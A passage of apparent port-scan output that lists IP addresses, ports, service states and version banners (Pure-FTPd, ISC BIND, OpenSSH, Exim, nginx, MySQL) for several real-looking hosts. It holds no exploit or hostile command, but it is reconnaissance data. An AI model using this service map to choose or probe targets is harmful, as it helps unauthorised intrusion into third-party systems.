7475149.126.72.220 18004 tcp tcpwrapped open
7476149.126.72.220 18005 tcp tcpwrapped open
7477149.126.72.220 18006 tcp tcpwrapped open
7478149.126.72.220 18007 tcp tcpwrapped open
7479149.126.72.220 18008 tcp tcpwrapped open
7480149.126.72.220 18009 tcp tcpwrapped open
7481149.126.72.220 18010 tcp tcpwrapped open
7482149.126.72.220 18011 tcp tcpwrapped open
7483149.126.72.220 18012 tcp tcpwrapped open
7484149.126.72.220 18013 tcp tcpwrapped open
7485149.126.72.220 18014 tcp tcpwrapped open
7486149.126.72.220 18015 tcp tcpwrapped open
7487149.126.72.220 18016 tcp tcpwrapped open
7488149.126.72.220 18017 tcp tcpwrapped open
7489149.126.72.220 18018 tcp tcpwrapped open
7490149.126.72.220 18019 tcp tcpwrapped open
7491149.126.72.220 18020 tcp tcpwrapped open
7492149.126.72.220 18021 tcp tcpwrapped open
7493149.126.72.220 18022 tcp tcpwrapped open
7494149.126.72.220 18023 tcp tcpwrapped open
7495149.126.72.220 18024 tcp tcpwrapped open
7496149.126.72.220 18025 tcp tcpwrapped open
7497149.126.72.220 18026 tcp tcpwrapped open
7498149.126.72.220 18027 tcp tcpwrapped open
7499149.126.72.220 18028 tcp tcpwrapped open
7500149.126.72.220 18029 tcp tcpwrapped open
7501149.126.72.220 18030 tcp tcpwrapped open
7502149.126.72.220 18031 tcp tcpwrapped open
7503149.126.72.220 18032 tcp tcpwrapped open
7504149.126.72.220 18033 tcp tcpwrapped open
7505149.126.72.220 18034 tcp tcpwrapped open
7506149.126.72.220 18035 tcp tcpwrapped open
7507149.126.72.220 18036 tcp tcpwrapped open
7508149.126.72.220 18037 tcp tcpwrapped open
7509149.126.72.220 18038 tcp tcpwrapped open
7510149.126.72.220 18039 tcp tcpwrapped open
7511149.126.72.220 18040 tcp tcpwrapped open
7512149.126.72.220 18041 tcp tcpwrapped open
7513149.126.72.220 18042 tcp tcpwrapped open
7514149.126.72.220 18043 tcp tcpwrapped open
7515149.126.72.220 18044 tcp tcpwrapped open
7516149.126.72.220 18045 tcp tcpwrapped open
7517149.126.72.220 18046 tcp tcpwrapped open
7518149.126.72.220 18047 tcp tcpwrapped open
7519149.126.72.220 18048 tcp tcpwrapped open
7520149.126.72.220 18049 tcp tcpwrapped open
7521149.126.72.220 18050 tcp tcpwrapped open
7522149.126.72.220 18051 tcp tcpwrapped open
7523149.126.72.220 18052 tcp tcpwrapped open
7524149.126.72.220 18053 tcp tcpwrapped open
7525149.126.72.220 18054 tcp tcpwrapped open
7526149.126.72.220 18055 tcp tcpwrapped open
7527149.126.72.220 18056 tcp tcpwrapped open
7528149.126.72.220 18057 tcp tcpwrapped open
7529149.126.72.220 18058 tcp tcpwrapped open
7530149.126.72.220 18059 tcp tcpwrapped open
7531149.126.72.220 18060 tcp tcpwrapped open
7532149.126.72.220 18061 tcp tcpwrapped open
7533149.126.72.220 18062 tcp tcpwrapped open
7534149.126.72.220 18063 tcp tcpwrapped open
7535149.126.72.220 18064 tcp tcpwrapped open
7536149.126.72.220 18065 tcp tcpwrapped open
7537149.126.72.220 18066 tcp tcpwrapped open
7538149.126.72.220 18067 tcp tcpwrapped open
7539149.126.72.220 18068 tcp tcpwrapped open
7540149.126.72.220 18069 tcp tcpwrapped open
7541149.126.72.220 18070 tcp tcpwrapped open
7542149.126.72.220 18071 tcp tcpwrapped open
7543149.126.72.220 18072 tcp tcpwrapped open
7544149.126.72.220 18073 tcp tcpwrapped open
7545149.126.72.220 18074 tcp tcpwrapped open
7546149.126.72.220 18075 tcp tcpwrapped open
7547149.126.72.220 18076 tcp tcpwrapped open
7548149.126.72.220 18077 tcp tcpwrapped open
7549149.126.72.220 18078 tcp tcpwrapped open
7550149.126.72.220 18079 tcp tcpwrapped open
7551149.126.72.220 18080 tcp tcpwrapped open
7552149.126.72.220 18081 tcp tcpwrapped open
7553149.126.72.220 18082 tcp tcpwrapped open
7554149.126.72.220 18083 tcp tcpwrapped open
7555149.126.72.220 18084 tcp tcpwrapped open
7556149.126.72.220 18085 tcp tcpwrapped open
7557149.126.72.220 18086 tcp tcpwrapped open
7558149.126.72.220 18087 tcp tcpwrapped open
7559149.126.72.220 18088 tcp tcpwrapped open
7560149.126.72.220 18089 tcp tcpwrapped open
7561149.126.72.220 18090 tcp tcpwrapped open
7562149.126.72.220 18091 tcp tcpwrapped open
7563149.126.72.220 18092 tcp tcpwrapped open
7564149.126.72.220 18093 tcp tcpwrapped open
7565149.126.72.220 18094 tcp tcpwrapped open
7566149.126.72.220 18095 tcp tcpwrapped open
7567149.126.72.220 18096 tcp tcpwrapped open
7568149.126.72.220 18097 tcp tcpwrapped open
7569149.126.72.220 18098 tcp tcpwrapped open
7570149.126.72.220 18099 tcp tcpwrapped open
7571149.126.72.220 18100 tcp tcpwrapped open
7572149.126.72.220 18101 tcp tcpwrapped open
7573149.126.72.220 18102 tcp tcpwrapped open
7574149.126.72.220 18103 tcp tcpwrapped open
7575149.126.72.220 18104 tcp tcpwrapped open
7576149.126.72.220 18105 tcp tcpwrapped open
7577149.126.72.220 18106 tcp tcpwrapped open
7578149.126.72.220 18107 tcp tcpwrapped open
7579149.126.72.220 18108 tcp tcpwrapped open
7580149.126.72.220 18109 tcp tcpwrapped open
7581149.126.72.220 18110 tcp tcpwrapped open
7582149.126.72.220 18111 tcp tcpwrapped open
7583149.126.72.220 18112 tcp tcpwrapped open
7584149.126.72.220 18113 tcp tcpwrapped open
7585149.126.72.220 18200 tcp tcpwrapped open
7586149.126.72.220 18239 tcp tcpwrapped open
7587149.126.72.220 18443 tcp tcpwrapped open
7588149.126.72.220 18802 tcp tcpwrapped open
7589149.126.72.220 19013 tcp tcpwrapped open
7590149.126.72.220 19014 tcp tcpwrapped open
7591149.126.72.220 19015 tcp tcpwrapped open
7592149.126.72.220 19016 tcp tcpwrapped open
7593149.126.72.220 19017 tcp tcpwrapped open
7594149.126.72.220 19022 tcp tcpwrapped open
7595149.126.72.220 19080 tcp tcpwrapped open
7596149.126.72.220 19082 tcp tcpwrapped open
7597149.126.72.220 19084 tcp tcpwrapped open
7598149.126.72.220 19443 tcp tcpwrapped open
7599149.126.72.220 20000 tcp tcpwrapped open
7600149.126.72.220 20001 tcp tcpwrapped open
7601149.126.72.220 20010 tcp tcpwrapped open
7602149.126.72.220 20020 tcp tcpwrapped open
7603149.126.72.220 20030 tcp tcpwrapped open
7604149.126.72.220 20040 tcp tcpwrapped open
7605149.126.72.220 20050 tcp tcpwrapped open
7606149.126.72.220 20053 tcp tcpwrapped open
7607149.126.72.220 20060 tcp tcpwrapped open
7608149.126.72.220 20070 tcp tcpwrapped open
7609149.126.72.220 20080 tcp tcpwrapped open
7610149.126.72.220 20082 tcp tcpwrapped open
7611149.126.72.220 20084 tcp tcpwrapped open
7612149.126.72.220 20090 tcp tcpwrapped open
7613149.126.72.220 20100 tcp tcpwrapped open
7614149.126.72.220 20106 tcp tcpwrapped open
7615149.126.72.220 20107 tcp tcpwrapped open
7616149.126.72.220 20110 tcp tcpwrapped open
7617149.126.72.220 20150 tcp tcpwrapped open
7618149.126.72.220 20182 tcp tcpwrapped open
7619149.126.72.220 20184 tcp tcpwrapped open
7620149.126.72.220 20185 tcp tcpwrapped open
7621149.126.72.220 20200 tcp tcpwrapped open
7622149.126.72.220 20208 tcp tcpwrapped open
7623149.126.72.220 20325 tcp tcpwrapped open
7624149.126.72.220 20500 tcp tcpwrapped open
7625149.126.72.220 20512 tcp tcpwrapped open
7626149.126.72.220 20600 tcp tcpwrapped open
7627149.126.72.220 20800 tcp tcpwrapped open
7628149.126.72.220 20892 tcp tcpwrapped open
7629149.126.72.220 20894 tcp tcpwrapped open
7630149.126.72.220 20900 tcp tcpwrapped open
7631149.126.72.220 21081 tcp tcpwrapped open
7632149.126.72.220 21082 tcp tcpwrapped open
7633149.126.72.220 21083 tcp tcpwrapped open
7634149.126.72.220 21084 tcp tcpwrapped open
7635149.126.72.220 21100 tcp tcpwrapped open
7636149.126.72.220 21200 tcp tcpwrapped open
7637149.126.72.220 21300 tcp tcpwrapped open
7638149.126.72.220 21357 tcp tcpwrapped open
7639149.126.72.220 21381 tcp tcpwrapped open
7640149.126.72.220 21400 tcp tcpwrapped open
7641149.126.72.220 21500 tcp tcpwrapped open
7642149.126.72.220 21935 tcp tcpwrapped open
7643149.126.72.220 22082 tcp tcpwrapped open
7644149.126.72.220 22084 tcp tcpwrapped open
7645149.126.72.220 22103 tcp tcpwrapped open
7646149.126.72.220 22107 tcp tcpwrapped open
7647149.126.72.220 22206 tcp tcpwrapped open
7648149.126.72.220 22345 tcp tcpwrapped open
7649149.126.72.220 22403 tcp tcpwrapped open
7650149.126.72.220 22609 tcp tcpwrapped open
7651149.126.72.220 22703 tcp tcpwrapped open
7652149.126.72.220 22705 tcp tcpwrapped open
7653149.126.72.220 23082 tcp tcpwrapped open
7654149.126.72.220 23084 tcp tcpwrapped open
7655149.126.72.220 23182 tcp tcpwrapped open
7656149.126.72.220 23184 tcp tcpwrapped open
7657149.126.72.220 24082 tcp tcpwrapped open
7658149.126.72.220 24084 tcp tcpwrapped open
7659149.126.72.220 24472 tcp tcpwrapped open
7660149.126.72.220 24510 tcp tcpwrapped open
7661149.126.72.220 25000 tcp tcpwrapped open
7662149.126.72.220 25001 tcp tcpwrapped open
7663149.126.72.220 25002 tcp tcpwrapped open
7664149.126.72.220 25003 tcp tcpwrapped open
7665149.126.72.220 25004 tcp tcpwrapped open
7666149.126.72.220 25005 tcp tcpwrapped open
7667149.126.72.220 25006 tcp tcpwrapped open
7668149.126.72.220 25007 tcp tcpwrapped open
7669149.126.72.220 25008 tcp tcpwrapped open
7670149.126.72.220 25009 tcp tcpwrapped open
7671149.126.72.220 25010 tcp tcpwrapped open
7672149.126.72.220 25082 tcp tcpwrapped open
7673149.126.72.220 25084 tcp tcpwrapped open
7674149.126.72.220 25782 tcp tcpwrapped open
7675149.126.72.220 25952 tcp tcpwrapped open
7676149.126.72.220 27571 tcp tcpwrapped open
7677149.126.72.220 28001 tcp tcpwrapped open
7678149.126.72.220 28080 tcp tcpwrapped open
7679149.126.72.220 28818 tcp tcpwrapped open
7680149.126.72.220 29798 tcp tcpwrapped open
7681149.126.72.220 29799 tcp tcpwrapped open
7682149.126.72.220 30000 tcp tcpwrapped open
7683149.126.72.220 30001 tcp tcpwrapped open
7684149.126.72.220 30003 tcp tcpwrapped open
7685149.126.72.220 30005 tcp tcpwrapped open
7686149.126.72.220 30007 tcp tcpwrapped open
7687149.126.72.220 30009 tcp tcpwrapped open
7688149.126.72.220 30011 tcp tcpwrapped open
7689149.126.72.220 30013 tcp tcpwrapped open
7690149.126.72.220 30015 tcp tcpwrapped open
7691149.126.72.220 30017 tcp tcpwrapped open
7692149.126.72.220 30019 tcp tcpwrapped open
7693149.126.72.220 30021 tcp tcpwrapped open
7694149.126.72.220 30050 tcp tcpwrapped open
7695149.126.72.220 30106 tcp tcpwrapped open
7696149.126.72.220 30110 tcp tcpwrapped open
7697149.126.72.220 30111 tcp tcpwrapped open
7698149.126.72.220 30112 tcp tcpwrapped open
7699149.126.72.220 30113 tcp tcpwrapped open
7700149.126.72.220 30120 tcp tcpwrapped open
7701149.126.72.220 30121 tcp tcpwrapped open
7702149.126.72.220 30122 tcp tcpwrapped open
7703149.126.72.220 30123 tcp tcpwrapped open
7704149.126.72.220 30452 tcp tcpwrapped open
7705149.126.72.220 30468 tcp tcpwrapped open
7706149.126.72.220 30473 tcp tcpwrapped open
7707149.126.72.220 30479 tcp tcpwrapped open
7708149.126.72.220 30501 tcp tcpwrapped open
7709149.126.72.220 30700 tcp tcpwrapped open
7710149.126.72.220 30701 tcp tcpwrapped open
7711149.126.72.220 30892 tcp tcpwrapped open
7712149.126.72.220 30894 tcp tcpwrapped open
7713149.126.72.220 31337 tcp tcpwrapped open
7714149.126.72.220 32101 tcp tcpwrapped open
7715149.126.72.220 32102 tcp tcpwrapped open
7716149.126.72.220 32202 tcp tcpwrapped open
7717149.126.72.220 32303 tcp tcpwrapped open
7718149.126.72.220 32443 tcp tcpwrapped open
7719149.126.72.220 32444 tcp tcpwrapped open
7720149.126.72.220 32746 tcp tcpwrapped open
7721149.126.72.220 32800 tcp tcpwrapped open
7722149.126.72.220 34225 tcp tcpwrapped open
7723149.126.72.220 34500 tcp tcpwrapped open
7724149.126.72.220 35522 tcp tcpwrapped open
7725149.126.72.220 35524 tcp tcpwrapped open
7726149.126.72.220 35531 tcp tcpwrapped open
7727149.126.72.220 35554 tcp tcpwrapped open
7728149.126.72.220 35559 tcp tcpwrapped open
7729149.126.72.220 35560 tcp tcpwrapped open
7730149.126.72.220 36982 tcp tcpwrapped open
7731149.126.72.220 36983 tcp tcpwrapped open
7732149.126.72.220 36984 tcp tcpwrapped open
7733149.126.72.220 37080 tcp tcpwrapped open
7734149.126.72.220 38880 tcp tcpwrapped open
7735149.126.72.220 39001 tcp tcpwrapped open
7736149.126.72.220 40070 tcp tcpwrapped open
7737149.126.72.220 40099 tcp tcpwrapped open
7738149.126.72.220 40892 tcp tcpwrapped open
7739149.126.72.220 40894 tcp tcpwrapped open
7740149.126.72.220 42208 tcp tcpwrapped open
7741149.126.72.220 42424 tcp tcpwrapped open
7742149.126.72.220 42901 tcp tcpwrapped open
7743149.126.72.220 43008 tcp tcpwrapped open
7744149.126.72.220 43009 tcp tcpwrapped open
7745149.126.72.220 43200 tcp tcpwrapped open
7746149.126.72.220 44100 tcp tcpwrapped open
7747149.126.72.220 44300 tcp tcpwrapped open
7748149.126.72.220 44301 tcp tcpwrapped open
7749149.126.72.220 44302 tcp tcpwrapped open
7750149.126.72.220 44303 tcp tcpwrapped open
7751149.126.72.220 44304 tcp tcpwrapped open
7752149.126.72.220 44305 tcp tcpwrapped open
7753149.126.72.220 44306 tcp tcpwrapped open
7754149.126.72.220 44307 tcp tcpwrapped open
7755149.126.72.220 44308 tcp tcpwrapped open
7756149.126.72.220 44309 tcp tcpwrapped open
7757149.126.72.220 44310 tcp tcpwrapped open
7758149.126.72.220 44320 tcp tcpwrapped open
7759149.126.72.220 44332 tcp tcpwrapped open
7760149.126.72.220 44333 tcp tcpwrapped open
7761149.126.72.220 44334 tcp tcpwrapped open
7762149.126.72.220 44336 tcp tcpwrapped open
7763149.126.72.220 44337 tcp tcpwrapped open
7764149.126.72.220 44340 tcp tcpwrapped open
7765149.126.72.220 44341 tcp tcpwrapped open
7766149.126.72.220 44345 tcp tcpwrapped open
7767149.126.72.220 44400 tcp tcpwrapped open
7768149.126.72.220 44410 tcp tcpwrapped open
7769149.126.72.220 44420 tcp tcpwrapped open
7770149.126.72.220 45000 tcp tcpwrapped open
7771149.126.72.220 45555 tcp tcpwrapped open
7772149.126.72.220 45666 tcp tcpwrapped open
7773149.126.72.220 45667 tcp tcpwrapped open
7774149.126.72.220 45668 tcp tcpwrapped open
7775149.126.72.220 45677 tcp tcpwrapped open
7776149.126.72.220 45777 tcp tcpwrapped open
7777149.126.72.220 45788 tcp tcpwrapped open
7778149.126.72.220 45821 tcp tcpwrapped open
7779149.126.72.220 45886 tcp tcpwrapped open
7780149.126.72.220 45888 tcp tcpwrapped open
7781149.126.72.220 46000 tcp tcpwrapped open
7782149.126.72.220 46443 tcp tcpwrapped open
7783149.126.72.220 46862 tcp tcpwrapped open
7784149.126.72.220 47000 tcp tcpwrapped open
7785149.126.72.220 47080 tcp tcpwrapped open
7786149.126.72.220 47534 tcp tcpwrapped open
7787149.126.72.220 48888 tcp tcpwrapped open
7788149.126.72.220 48889 tcp tcpwrapped open
7789149.126.72.220 49200 tcp tcpwrapped open
7790149.126.72.220 49210 tcp tcpwrapped open
7791149.126.72.220 49443 tcp tcpwrapped open
7792149.126.72.220 49682 tcp tcpwrapped open
7793149.126.72.220 49684 tcp tcpwrapped open
7794149.126.72.220 49686 tcp tcpwrapped open
7795149.126.72.220 49688 tcp tcpwrapped open
7796149.126.72.220 49690 tcp tcpwrapped open
7797149.126.72.220 49692 tcp tcpwrapped open
7798149.126.72.220 49694 tcp tcpwrapped open
7799149.126.72.220 50000 tcp tcpwrapped open
7800149.126.72.220 50001 tcp tcpwrapped open
7801149.126.72.220 50042 tcp tcpwrapped open
7802149.126.72.220 50050 tcp tcpwrapped open
7803149.126.72.220 50073 tcp tcpwrapped open
7804149.126.72.220 50085 tcp tcpwrapped open
7805149.126.72.220 50101 tcp tcpwrapped open
7806149.126.72.220 50102 tcp tcpwrapped open
7807149.126.72.220 50103 tcp tcpwrapped open
7808149.126.72.220 50104 tcp tcpwrapped open
7809149.126.72.220 50105 tcp tcpwrapped open
7810149.126.72.220 50106 tcp tcpwrapped open
7811149.126.72.220 50107 tcp tcpwrapped open
7812149.126.72.220 50112 tcp tcpwrapped open
7813149.126.72.220 50113 tcp tcpwrapped open
7814149.126.72.220 50122 tcp tcpwrapped open
7815149.126.72.220 50160 tcp tcpwrapped open
7816149.126.72.220 50443 tcp tcpwrapped open
7817149.126.72.220 51002 tcp tcpwrapped open
7818149.126.72.220 51003 tcp tcpwrapped open
7819149.126.72.220 51434 tcp tcpwrapped open
7820149.126.72.220 52010 tcp tcpwrapped open
7821149.126.72.220 52230 tcp tcpwrapped open
7822149.126.72.220 52311 tcp tcpwrapped open
7823149.126.72.220 52536 tcp tcpwrapped open
7824149.126.72.220 53480 tcp tcpwrapped open
7825149.126.72.220 53481 tcp tcpwrapped open
7826149.126.72.220 53482 tcp tcpwrapped open
7827149.126.72.220 53483 tcp tcpwrapped open
7828149.126.72.220 53484 tcp tcpwrapped open
7829149.126.72.220 53485 tcp tcpwrapped open
7830149.126.72.220 53490 tcp tcpwrapped open
7831149.126.72.220 53805 tcp tcpwrapped open
7832149.126.72.220 53806 tcp tcpwrapped open
7833149.126.72.220 54327 tcp tcpwrapped open
7834149.126.72.220 54490 tcp tcpwrapped open
7835149.126.72.220 54545 tcp tcpwrapped open
7836149.126.72.220 55055 tcp tcpwrapped open
7837149.126.72.220 55080 tcp tcpwrapped open
7838149.126.72.220 55081 tcp tcpwrapped open
7839149.126.72.220 55350 tcp tcpwrapped open
7840149.126.72.220 55388 tcp tcpwrapped open
7841149.126.72.220 55470 tcp tcpwrapped open
7842149.126.72.220 55475 tcp tcpwrapped open
7843149.126.72.220 55481 tcp tcpwrapped open
7844149.126.72.220 55490 tcp tcpwrapped open
7845149.126.72.220 57778 tcp tcpwrapped open
7846149.126.72.220 57779 tcp tcpwrapped open
7847149.126.72.220 57780 tcp tcpwrapped open
7848149.126.72.220 57781 tcp tcpwrapped open
7849149.126.72.220 57782 tcp tcpwrapped open
7850149.126.72.220 57783 tcp tcpwrapped open
7851149.126.72.220 57784 tcp tcpwrapped open
7852149.126.72.220 57785 tcp tcpwrapped open
7853149.126.72.220 57786 tcp tcpwrapped open
7854149.126.72.220 57787 tcp tcpwrapped open
7855149.126.72.220 57788 tcp tcpwrapped open
7856149.126.72.220 58443 tcp tcpwrapped open
7857149.126.72.220 58585 tcp tcpwrapped open
7858149.126.72.220 59012 tcp tcpwrapped open
7859149.126.72.220 59443 tcp tcpwrapped open
7860149.126.72.220 60021 tcp tcpwrapped open
7861149.126.72.220 60023 tcp tcpwrapped open
7862149.126.72.220 60443 tcp tcpwrapped open
7863149.126.72.220 62080 tcp tcpwrapped open
7864149.126.72.220 62237 tcp tcpwrapped open
7865149.126.72.220 62443 tcp tcpwrapped open
7866149.126.72.220 62865 tcp tcpwrapped open
7867149.126.72.220 63443 tcp tcpwrapped open
7868149.126.72.220 64477 tcp tcpwrapped open
7869149.126.72.220 64671 tcp tcpwrapped open
7870151.106.38.107 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 50 allowed.\x0d\x0a220-Local time is now 12:11. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
7871151.106.38.107 53 tcp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
7872151.106.38.107 53 udp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
7873151.106.38.107 67 tcp dhcps filtered
7874151.106.38.107 67 udp dhcps unknown
7875151.106.38.107 68 tcp dhcpc filtered
7876151.106.38.107 68 udp dhcpc unknown
7877151.106.38.107 69 tcp tftp filtered
7878151.106.38.107 69 udp tftp unknown
7879151.106.38.107 88 tcp kerberos-sec filtered
7880151.106.38.107 88 udp kerberos-sec unknown
7881151.106.38.107 123 tcp ntp filtered
7882151.106.38.107 123 udp ntp unknown
7883151.106.38.107 137 tcp netbios-ns filtered
7884151.106.38.107 137 udp netbios-ns unknown
7885151.106.38.107 138 tcp netbios-dgm filtered
7886151.106.38.107 138 udp netbios-dgm unknown
7887151.106.38.107 139 tcp netbios-ssn filtered
7888151.106.38.107 139 udp netbios-ssn unknown
7889151.106.38.107 161 tcp snmp filtered
7890151.106.38.107 161 udp snmp unknown
7891151.106.38.107 162 tcp snmptrap filtered
7892151.106.38.107 162 udp snmptrap unknown
7893151.106.38.107 389 tcp ldap filtered
7894151.106.38.107 389 udp ldap unknown
7895151.106.38.107 520 tcp efs filtered
7896151.106.38.107 520 udp route unknown
7897151.106.38.107 2049 tcp nfs filtered
7898151.106.38.107 2049 udp nfs unknown
7899158.69.13.254 22 tcp ssh open OpenSSH 7.4 protocol 2.0
7900158.69.13.254 25 tcp smtp open Exim smtpd 4.92.3
7901158.69.13.254 53 tcp domain open unknown banner: get lost
7902158.69.13.254 53 udp domain open unknown banner: get lost
7903158.69.13.254 67 tcp dhcps filtered
7904158.69.13.254 67 udp dhcps unknown
7905158.69.13.254 68 tcp dhcpc filtered
7906158.69.13.254 68 udp dhcpc unknown
7907158.69.13.254 69 tcp tftp filtered
7908158.69.13.254 69 udp tftp unknown
7909158.69.13.254 80 tcp http open nginx
7910158.69.13.254 88 tcp kerberos-sec filtered
7911158.69.13.254 88 udp kerberos-sec unknown
7912158.69.13.254 123 tcp ntp filtered
7913158.69.13.254 123 udp ntp unknown
7914158.69.13.254 137 tcp netbios-ns filtered
7915158.69.13.254 137 udp netbios-ns unknown
7916158.69.13.254 138 tcp netbios-dgm filtered
7917158.69.13.254 138 udp netbios-dgm unknown
7918158.69.13.254 139 tcp netbios-ssn filtered
7919158.69.13.254 139 udp netbios-ssn unknown
7920158.69.13.254 161 tcp snmp filtered
7921158.69.13.254 161 udp snmp unknown
7922158.69.13.254 162 tcp snmptrap filtered
7923158.69.13.254 162 udp snmptrap unknown
7924158.69.13.254 389 tcp ldap filtered
7925158.69.13.254 389 udp ldap unknown
7926158.69.13.254 443 tcp ssl/http open nginx
7927158.69.13.254 465 tcp ssl/smtp open Exim smtpd 4.92.3
7928158.69.13.254 520 tcp efs filtered
7929158.69.13.254 520 udp route unknown
7930158.69.13.254 587 tcp smtp open Exim smtpd 4.92.3
7931158.69.13.254 2049 tcp nfs filtered
7932158.69.13.254 2049 udp nfs unknown
7933158.69.13.254 2525 tcp smtp open Exim smtpd 4.92.3
7934158.69.13.254 3306 tcp mysql open MySQL blocked - too many connection errors
7935162.244.35.13 22 tcp ssh open SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
7936162.244.35.13 25 tcp open
7937162.244.35.13 53 tcp domain open ISC BIND 9.10.6
7938162.244.35.13 53 udp domain open ISC BIND 9.10.6
7939162.244.35.13 67 tcp dhcps closed
7940162.244.35.13 67 udp dhcps closed
7941162.244.35.13 68 tcp dhcpc closed
7942162.244.35.13 68 udp dhcpc closed
7943162.244.35.13 69 tcp tftp closed
7944162.244.35.13 69 udp tftp closed
7945162.244.35.13 88 tcp kerberos-sec closed
7946162.244.35.13 88 udp kerberos-sec closed
7947162.244.35.13 123 tcp ntp closed
7948162.244.35.13 123 udp ntp closed
7949162.244.35.13 137 tcp netbios-ns filtered
7950162.244.35.13 137 udp netbios-ns unknown
7951162.244.35.13 138 tcp netbios-dgm filtered
7952162.244.35.13 138 udp netbios-dgm unknown
7953162.244.35.13 139 tcp netbios-ssn filtered
7954162.244.35.13 139 udp netbios-ssn unknown
7955162.244.35.13 161 tcp snmp closed
7956162.244.35.13 161 udp snmp closed
7957162.244.35.13 162 tcp snmptrap closed
7958162.244.35.13 162 udp snmptrap closed
7959162.244.35.13 389 tcp ldap closed
7960162.244.35.13 389 udp ldap closed
7961162.244.35.13 520 tcp efs closed
7962162.244.35.13 520 udp route closed
7963162.244.35.13 2049 tcp nfs closed
7964162.244.35.13 2049 udp nfs closed
7965169.239.218.20 25 tcp smtp closed
7966169.239.218.20 53 tcp domain filtered
7967169.239.218.20 53 udp domain unknown
7968169.239.218.20 67 tcp dhcps filtered
7969169.239.218.20 67 udp dhcps unknown
7970169.239.218.20 68 tcp dhcpc filtered
7971169.239.218.20 68 udp dhcpc unknown
7972169.239.218.20 69 tcp tftp filtered
7973169.239.218.20 69 udp tftp unknown
7974169.239.218.20 88 tcp kerberos-sec filtered
7975169.239.218.20 88 udp kerberos-sec unknown
7976169.239.218.20 113 tcp ident closed
7977169.239.218.20 123 tcp ntp filtered
7978169.239.218.20 123 udp ntp unknown
7979169.239.218.20 137 tcp netbios-ns filtered
7980169.239.218.20 137 udp netbios-ns filtered
7981169.239.218.20 138 tcp netbios-dgm filtered
7982169.239.218.20 138 udp netbios-dgm filtered
7983169.239.218.20 139 tcp netbios-ssn closed
7984169.239.218.20 139 udp netbios-ssn unknown
7985169.239.218.20 161 tcp snmp filtered
7986169.239.218.20 161 udp snmp unknown
7987169.239.218.20 162 tcp snmptrap filtered
7988169.239.218.20 162 udp snmptrap unknown
7989169.239.218.20 389 tcp ldap filtered
7990169.239.218.20 389 udp ldap unknown
7991169.239.218.20 445 tcp microsoft-ds closed
7992169.239.218.20 520 tcp efs filtered
7993169.239.218.20 520 udp route unknown
7994169.239.218.20 2049 tcp nfs filtered
7995169.239.218.20 2049 udp nfs unknown
7996169.239.218.20 8008 tcp tcpwrapped open
7997173.214.244.169 53 tcp domain filtered
7998173.214.244.169 53 udp domain unknown
7999173.214.244.169 67 tcp dhcps filtered
8000173.214.244.169 67 udp dhcps unknown
8001173.214.244.169 68 tcp dhcpc filtered
8002173.214.244.169 68 udp dhcpc unknown
8003173.214.244.169 69 tcp tftp filtered
8004173.214.244.169 69 udp tftp unknown
8005173.214.244.169 88 tcp kerberos-sec filtered
8006173.214.244.169 88 udp kerberos-sec unknown
8007173.214.244.169 123 tcp ntp filtered
8008173.214.244.169 123 udp ntp unknown
8009173.214.244.169 137 tcp netbios-ns filtered
8010173.214.244.169 137 udp netbios-ns unknown
8011173.214.244.169 138 tcp netbios-dgm filtered
8012173.214.244.169 138 udp netbios-dgm unknown
8013173.214.244.169 139 tcp netbios-ssn filtered
8014173.214.244.169 139 udp netbios-ssn unknown
8015173.214.244.169 161 tcp snmp filtered
8016173.214.244.169 161 udp snmp unknown
8017173.214.244.169 162 tcp snmptrap filtered
8018173.214.244.169 162 udp snmptrap unknown
8019173.214.244.169 389 tcp ldap filtered
8020173.214.244.169 389 udp ldap unknown
8021173.214.244.169 520 tcp efs filtered
8022173.214.244.169 520 udp route unknown
8023173.214.244.169 2049 tcp nfs filtered
8024173.214.244.169 2049 udp nfs unknown
8025174.142.53.51 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 50 allowed.\x0d\x0a220-Local time is now 13:59. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
8026174.142.53.51 22 tcp ssh open SSH-2.0-OpenSSH_7.4
8027174.142.53.51 25 tcp smtp closed
8028174.142.53.51 53 tcp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
8029174.142.53.51 53 udp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
8030174.142.53.51 67 tcp dhcps filtered
8031174.142.53.51 67 udp dhcps unknown
8032174.142.53.51 68 tcp dhcpc filtered
8033174.142.53.51 68 udp dhcpc unknown
8034174.142.53.51 69 tcp tftp filtered
8035174.142.53.51 69 udp tftp unknown
8036174.142.53.51 88 tcp kerberos-sec filtered
8037174.142.53.51 88 udp kerberos-sec unknown
8038174.142.53.51 123 tcp ntp filtered
8039174.142.53.51 123 udp ntp unknown
8040174.142.53.51 137 tcp netbios-ns filtered
8041174.142.53.51 137 udp netbios-ns filtered
8042174.142.53.51 138 tcp netbios-dgm filtered
8043174.142.53.51 138 udp netbios-dgm filtered
8044174.142.53.51 139 tcp netbios-ssn closed
8045174.142.53.51 139 udp netbios-ssn unknown
8046174.142.53.51 161 tcp snmp filtered
8047174.142.53.51 161 udp snmp unknown
8048174.142.53.51 162 tcp snmptrap filtered
8049174.142.53.51 162 udp snmptrap unknown
8050174.142.53.51 389 tcp ldap filtered
8051174.142.53.51 389 udp ldap unknown
8052174.142.53.51 445 tcp microsoft-ds closed
8053174.142.53.51 520 tcp efs filtered
8054174.142.53.51 520 udp route unknown
8055174.142.53.51 2049 tcp nfs filtered
8056174.142.53.51 2049 udp nfs unknown
8057190.98.209.37 53 tcp domain filtered
8058190.98.209.37 53 udp domain unknown
8059190.98.209.37 67 tcp dhcps filtered
8060190.98.209.37 67 udp dhcps unknown
8061190.98.209.37 68 tcp dhcpc filtered
8062190.98.209.37 68 udp dhcpc unknown
8063190.98.209.37 69 tcp tftp filtered
8064190.98.209.37 69 udp tftp unknown
8065190.98.209.37 88 tcp kerberos-sec filtered
8066190.98.209.37 88 udp kerberos-sec unknown
8067190.98.209.37 123 tcp ntp filtered
8068190.98.209.37 123 udp ntp unknown
